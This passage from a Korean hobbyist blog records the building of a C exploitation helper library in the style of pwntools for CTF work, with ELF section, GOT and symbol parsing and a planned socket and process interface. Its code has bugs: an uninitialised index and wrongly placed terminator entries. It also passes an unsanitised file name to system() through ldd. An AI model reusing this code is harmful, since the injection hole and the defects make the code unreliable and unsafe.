url('https://scrap.kakaocdn.net/dn/KCQAI/hyKxIHILRj/mYdCRaJVqaFURkL9Go3tx0/img.jpg?width=2161&amp;height=1960&amp;face=0_0_2161_1960');">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">코딩 시작</p> <p class="og-desc" data-ke-size="size16">&nbsp;</p> <p class="og-host" data-ke-size="size16">youngsouk-hack.tistory.com</p> </div> </a></figure> <p data-ke-size="size16">이전에 했던 코딩에 이어서 GOT 정보를 얻어오는 함수를 구현하여 최종적으로 ELF의 정보들을 얻어오는 함수 및 구조체를 만들었다. 또한 해킹하고자 하는 프로그램이 사용한는 libc파일을 자동으로 얻어오는 함수를 구현했다.</p> <pre id="code_1623651962804" class="c++ arduino" data-ke-language="c++" data-ke-type="codeblock"><code>unsigned long long getGOT(GOT * got, char * target){ if(__glibc_unlikely(got == 0)) return 0; for(int i = 0; (got + i) -&gt; addr != 0 || (got + i) -&gt; name != 0; i++){ if(!(strcmp((got + i) -&gt; name, target))) return (got + i) -&gt; addr; } return 0; } SYM * findSYM(int fd, Section section){ int i; Elf64_Shdr * dynsymSection = getSectionInfo(section, ".dynsym"); Elf64_Shdr * dynstrSection = getSectionInfo(section, ".dynstr"); Elf64_Sym * dynsym = malloc(dynsymSection -&gt; sh_size); char * dynstr = malloc(dynstrSection -&gt; sh_size); int SymbolCnt = (dynsymSection -&gt; sh_size) / sizeof(Elf64_Sym); SYM * symbol = malloc(sizeof(SYM) * (SymbolCnt + 1)); //SymbolCnt + 1 : NULL 구조체 추가 char * t; int NameOffset; lseek(fd, dynsymSection -&gt; sh_offset, SEEK_SET); read(fd, dynsym, dynsymSection -&gt; sh_size); lseek(fd, dynstrSection -&gt; sh_offset, SEEK_SET); read(fd, dynstr, dynstrSection -&gt; sh_size); int idx; for(i = 0; i &lt; SymbolCnt; i++){ if(((dynsym + i) -&gt; st_value) != 0){ (symbol + idx) -&gt; value = (dynsym + i) -&gt; st_value; NameOffset = (dynsym + i) -&gt; st_name; (symbol + idx) -&gt; name = dynstr + NameOffset; idx++; } } (symbol + i) -&gt; value = 0; (symbol + i) -&gt; name = 0; return symbol; } unsigned long long getSYM(SYM * sym, char * target){ if(__glibc_unlikely(sym == 0)) return 0; for(int i = 0; (sym + i) -&gt; value != 0 || (sym + i) -&gt; name != 0; i++){ if(!(strcmp((sym + i) -&gt; name, target)))return (sym + i) -&gt; value; } return 0; } ELFInfo ELF(char * path){ int fd = open(path, O_RDONLY); ELFInfo elf; elf.fd = fd; elf.filename = path; elf.section = findSectionHeader(fd); elf.got = findGOTInfo(fd, elf.section); elf.sym = findSYM(fd, elf.section); return elf; } ELFInfo getLibcELF(ELFInfo elf){ char * LibcPath = malloc(1024); char * command = malloc(1024); int fd = open(".result.txt", O_RDWR | O_CREAT | O_TRUNC, 0644); ELFInfo LibcELF; char tmp; int i; sprintf(command, "ldd %s &gt;&gt; .result.txt", elf.filename); if(system(command) == -1){ printf("system() error"); exit(0); } for(int i = 0; i &lt; 2; i++){ while(1){ read(fd, &amp;tmp, 1); if(tmp == '&gt;') break; } } for(int i = 0; i&lt; 2; i++){ i = 0; while(1){ read(fd, &amp;tmp, 1); if(tmp == ' ') break; *(LibcPath + i) = tmp; i++; } } LibcELF = ELF(LibcPath); return LibcELF; }</code></pre> <p data-ke-size="size16">&nbsp;</p> 1인 1프로젝트 youngsouk https://youngsouk-hack.tistory.com/149 https://youngsouk-hack.tistory.com/149#entry149comment Mon, 10 May 2021 15:33:19 +0900 https://youngsouk-hack.tistory.com/146 <p style="text-align: left;" data-ke-size="size16">ELF 파일 구조체에 대한 공부를 해서 ELF 섹션 정보와 GOT 정보를 얻어오는 함수들을 구현했다.</p> <pre id="code_1623651777227" class="c++ arduino" data-ke-language="c++" data-ke-type="codeblock"><code>typedef struct Section{ Elf64_Half SectionCnt; Elf64_Half SectionStringIndex; char * SectionName; Elf64_Shdr * SectionHeader; }Section; typedef struct got{ char * name; unsigned long long addr; } GOT; typedef struct sym{ char * name; unsigned long long value; }SYM; typedef struct elfinfo{ int fd; char * filename; Section section; GOT * got; SYM * sym; }ELFInfo; Section findSectionHeader(int fd){ Section section; Elf64_Off * SectionHeader = malloc(sizeof(Elf64_Off)); Elf64_Half * SectionCnt = malloc(sizeof(Elf64_Half)); Elf64_Half * SectionStringIndex = malloc(sizeof(Elf64_Half)); Elf64_Shdr * SectionInformation; char * SectionName; //ELF 헤더 lseek(fd, offsetof(Elf64_Ehdr, e_shnum), SEEK_SET); read(fd, SectionCnt, sizeof(Elf64_Half)); section.SectionCnt = *SectionCnt; SectionInformation = malloc(*SectionCnt * sizeof(Elf64_Shdr)); section.SectionHeader = SectionInformation; lseek(fd, offsetof(Elf64_Ehdr, e_shoff), SEEK_SET); read(fd, SectionHeader, sizeof(Elf64_Off)); lseek(fd, offsetof(Elf64_Ehdr, e_shstrndx), SEEK_SET); read(fd, SectionStringIndex, sizeof(Elf64_Half)); section.SectionStringIndex = *SectionStringIndex; //색션 정보 얻기 lseek(fd, *SectionHeader, SEEK_SET); read(fd, SectionInformation, sizeof(Elf64_Shdr) * *SectionCnt); Elf64_Shdr * SectionString = SectionInformation + *SectionStringIndex; lseek(fd, SectionString -&gt; sh_offset, SEEK_SET); SectionName = malloc(SectionString -&gt; sh_size); read(fd, SectionName, SectionString -&gt; sh_size); section.SectionName = SectionName; return section; } Elf64_Shdr * getSectionInfo(Section section, char * name){ for(int i = 0; i &lt; section.SectionCnt; i++){ if(!strcmp(section.SectionName + ((section.SectionHeader + i) -&gt; sh_name),name)) return section.SectionHeader + i; } return 0; } GOT * findGOTInfo(int fd, Section section){ int i; Elf64_Shdr * PLTRelSection = getSectionInfo(section, ".rela.plt"); if(PLTRelSection == 0) return 0; Elf64_Shdr * dynsymSection = getSectionInfo(section, ".dynsym"); Elf64_Shdr * dynstrSection = getSectionInfo(section, ".dynstr"); Elf64_Rela * PLTRel = malloc(PLTRelSection -&gt; sh_size); Elf64_Sym * dynsym = malloc(dynsymSection -&gt; sh_size); char * dynstr = malloc(dynstrSection -&gt; sh_size); int SymOffset; // got 주소 얻는데 사용 int NameOffset; int FunctionCnt = (PLTRelSection -&gt; sh_size) / sizeof(Elf64_Rela); GOT * got = malloc(sizeof(GOT) * (FunctionCnt + 1)); //FunctionCnt + 1 NULL 구조체 추가 lseek(fd, PLTRelSection -&gt; sh_offset, SEEK_SET); read(fd, PLTRel, PLTRelSection -&gt; sh_size); lseek(fd, dynsymSection -&gt; sh_offset, SEEK_SET); read(fd, dynsym, dynsymSection -&gt; sh_size); lseek(fd, dynstrSection -&gt; sh_offset, SEEK_SET); read(fd, dynstr, dynstrSection -&gt; sh_size); int idx = 0; for(i = 0; i &lt; FunctionCnt; i++){ if((PLTRel + i) -&gt; r_offset != 0){ (got + idx) -&gt; addr = (PLTRel + i) -&gt; r_offset; SymOffset = ELF64_R_SYM((PLTRel + i) -&gt; r_info); NameOffset = (dynsym + SymOffset) -&gt; st_name; (got + idx) -&gt; name = dynstr + NameOffset; idx++; } } (got + i) -&gt; addr = 0; (got + i) -&gt; name = 0; return got; } </code></pre> 1인 1프로젝트 youngsouk https://youngsouk-hack.tistory.com/146 https://youngsouk-hack.tistory.com/146#entry146comment Tue, 27 Apr 2021 09:36:00 +0900 https://youngsouk-hack.tistory.com/145 <p style="text-align: left;" data-ke-size="size16">동작 방식을 설계해야 하는데 내가 기본적으로 구상하고 있는 기능들은 아래에 있다.</p> <p style="text-align: left;" data-ke-size="size16">1. 데이터 패킹 &amp; 언패킹 함수</p> <p style="text-align: left;" data-ke-size="size16">2. socket 통신을 위한 remote 함수</p> <p style="text-align: left;" data-ke-size="size16">3. 로컬 컴퓨터에서의 실행을 위한 Process 함수</p> <p style="text-align: left;" data-ke-size="size16">4. retmote로 실행되는 프로그램의 출력을 얻어오는 recv, recvuntil 함수</p> <p style="text-align: left;" data-ke-size="size16">5. retmote로 실행되는 프로그램에 값을 보내는 send, sendline함수</p> <p style="text-align: left;" data-ke-size="size16">6. remote로 실행되는 프로그램과 표준 출력&amp;표준 입력을 통해 상호작용하는 함수</p> <p style="text-align: left;" data-ke-size="size16">7. 출력되는 값을 보기 편하게 하기 위한 hexdump 함수</p> <p style="text-align: left;" data-ke-size="size16">기본적으로는 이정도 기능이 있다.</p> <p style="text-align: left;" data-ke-size="size16">&nbsp;</p> <p style="text-align: left;" data-ke-size="size16">기본적인 동작방법은 아래의 순서와 같다.</p> <p style="text-align: left;" data-ke-size="size16">1. ELFinfo 구조체에 ELF함수를 이용하여, GOT, SYM 등의 정보를 얻어온다.</p> <p style="text-align: left;" data-ke-size="size16">2. remote 또는 process함수를 통해 원격 또는 로컬에서 해킹 대상 프로그램을 실행한다.</p> <p style="text-align: left;" data-ke-size="size16">3. recv, send함수를 이용하여 해킹을 진행한다.</p> <p style="text-align: left;" data-ke-size="size16">&nbsp;</p> <p style="text-align: left;" data-ke-size="size16">또한 내가 원하는 함수를 구현하기 위한 함수들을 정리해보면 이렇다.</p> <p style="text-align: left;" data-ke-size="size16">process - fork(), dup2() 등</p> <p style="text-align: left;" data-ke-size="size16">remote - socket(), connect() 등</p> <p style="text-align: left;" data-ke-size="size16">&nbsp;</p> 1인 1프로젝트 youngsouk https://youngsouk-hack.tistory.com/145 https://youngsouk-hack.tistory.com/145#entry145comment Mon, 26 Apr 2021 15:39:06 +0900 https://youngsouk-hack.tistory.com/144 <p data-ke-size="size16">ELF &nbsp;섹션 정보 구조체</p> <p data-ke-size="size16">- 섹션 갯수</p> <p data-ke-size="size16">- 섹션 Index</p> <p data-ke-size="size16">- &nbsp;섹션 이름</p> <p data-ke-size="size16">- 섹션 헤더</p> <p data-ke-size="size16">&nbsp;</p> <p data-ke-size="size16">GOT 정보 구조체</p> <p data-ke-size="size16">- 이름 문자열 포인터</p> <p data-ke-size="size16">- 주소값</p> <p data-ke-size="size16">&nbsp;</p> <p data-ke-size="size16">SYM 정보 구조체</p> <p data-ke-size="size16">- 이름 문자열 포인터</p> <p data-ke-size="size16">- 값</p> <p data-ke-size="size16">&nbsp;</p> <p data-ke-size="size16">ELF 파일 정보 구조체</p> <p data-ke-size="size16">- fd 값</p> <p data-ke-size="size16">- 파일 이름 포인터</p> <p data-ke-size="size16">-섹션 정보</p> <p data-ke-size="size16">- GOT 정보</p> <p data-ke-size="size16">- SYM 정보</p> <p data-ke-size="size16">&nbsp;</p> <p data-ke-size="size16">이런 정보를 바탕으로 구조체 설계를 해본 결과는</p> <pre id="code_1623650893711" class="c++ arduino" data-ke-language="c++" data-ke-type="codeblock"><code>typedef struct Section{ Elf64_Half SectionCnt; Elf64_Half SectionStringIndex; char * SectionName; Elf64_Shdr * SectionHeader; }Section; typedef struct got{ char * name; unsigned long long addr; } GOT; typedef struct sym{ char * name; unsigned long long value; }SYM; typedef struct elfinfo{ int fd; char * filename; Section section; GOT * got; SYM * sym; }ELFInfo;</code></pre> <p data-ke-size="size16">이런 식으로 된다.</p> 1인 1프로젝트 youngsouk https://youngsouk-hack.tistory.com/144 https://youngsouk-hack.tistory.com/144#entry144comment Tue, 20 Apr 2021 09:36:30 +0900 https://youngsouk-hack.tistory.com/143 <p style="text-align: left;" data-ke-size="size16"><a href="https://modoocode.com/231" target="_blank" rel="noopener">https://modoocode.com/231</a></p> <figure id="og_1623650251649" contenteditable="false" data-ke-type="opengraph" data-ke-align="alignCenter" data-og-type="website" data-og-title="씹어먹는 C 언어 시작하기" data-og-description="" data-og-host="modoocode.com" data-og-source-url="https://modoocode.com/231" data-og-url="https://modoocode.com/231" data-og-image=""><a href="https://modoocode.com/231" target="_blank" rel="noopener" data-source-url="https://modoocode.com/231"> <div class="og-image" style="background-image: url();">&nbsp;</div> <div class="og-text"> <p class="og-title" data-ke-size="size16">씹어먹는 C 언어 시작하기</p> <p class="og-desc" data-ke-size="size16">&nbsp;</p> <p class="og-host" data-ke-size="size16">modoocode.com</p> </div> </a></figure> <p data-ke-size="size16">이 사이트의 예제들을 눈으로 훏어보고 포인터를 활용하는 간단한 프로그램들을 만들어보면서 기억을 되살렸다.</p> <p data-ke-size="size16">또한 이전에 풀었던 해킹 문제 writeup 글들과 리눅스 라이브러리 코드 글들을 보면서 해킹 지식을 기억하려고 노력했다.</p> <pre id="code_1623650526292" class="c++ arduino" data-ke-language="c++" data-ke-type="codeblock"><code>#include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; #define BUF_SIZE 100 int main() { FILE *fp = NULL; FILE *fp2 = NULL; int nbyte=0; char buf[BUF_SIZE]={0, }; // file open fp = fopen("./proto.c","rb"); if ( fp == NULL ) { printf(" fopen() error \n"); exit(0); } fp2 = fopen("./p.txt","wb"); if ( fp2 == NULL ) { printf(" fopen() error \n"); exit(0); } // Read data from proto.c : BUF_SIZE while(1) { memset(&amp;buf, 0, BUF_SIZE); // file read nbyte = fread(buf, 1, BUF_SIZE, fp); if ( nbyte &lt;= 0 ){ break; } // new file write fwrite(buf, 1, nbyte, fp2); } fclose(fp); fclose(fp2); } </code></pre> <p data-ke-size="size16">이 코드를 작성하면서 memset, scanf, FILE IO, socket 등에 대한 지식을 되살렸다.</p> <p data-ke-size="size16">이 코드 외에도 github에서 C언어로 짜여진 프로그램 분석을 열심히 했다.</p> 1인 1프로젝트 youngsouk https://youngsouk-hack.tistory.com/143 https://youngsouk-hack.tistory.com/143#entry143comment Tue, 30 Mar 2021 09:39:57 +0900